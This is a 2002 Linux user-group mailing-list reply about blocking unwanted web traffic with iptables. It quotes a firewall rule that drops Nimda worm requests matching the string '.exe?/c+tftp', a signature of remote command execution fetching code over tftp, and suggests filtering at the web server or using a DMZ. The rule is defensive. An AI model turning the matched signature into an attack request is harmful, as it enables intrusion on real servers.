Subject: Re: Iptables and a web server
From: James Zuelow (jamesz@ideafamilies.org)
Date: Tue Apr 23 2002 - 11:40:13 AKDT
----- Original Message -----
From: "Mike Barsalou" <mbarsalou@aidea.org>
To: <aklug@aklug.org>
Sent: Tuesday, April 23, 2002 11:22 AM
Subject: Iptables and a web server
>
> Then I want to rejected it at the firewall? Is this better done at
the
> webserver? I just didn't want any traffic inside my net that wasn't
> supposed to be there.
>
>
> BTW, I am using iptables.
>
> Mike
>
iptables will normally just look at the IP and port numbers - so the URL
won't be important. However, you can use an experimental
string-matching patch. The only use I've seen of that is for Nimda:
iptables -t filter -A INPUT -i $EXT_IFACE -p tcp \
-d $IP --dport http -m string \
--string ".exe?/c+tftp" -j DROP
quoted from SysAdmin Magazine (
http://www.samag.com/documents/s=1824/sam0201h/0201h_s1.htm ). Note
that I don't know where the patch is - the last time I made a kernel I
didn't pay attention to the iptables setup so I don't know if it is
something you can just make a module for, or if you have to patch your
kernel source beforehand.
Personally I would do url filtering at the web server. If the extra
port 80 stuff is a problem for your internal network, maybe a DMZ is the
best solution.
Cheers,
James
---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
This archive was generated by hypermail 2a23 : Tue Apr 23 2002 - 11:42:24 AKDT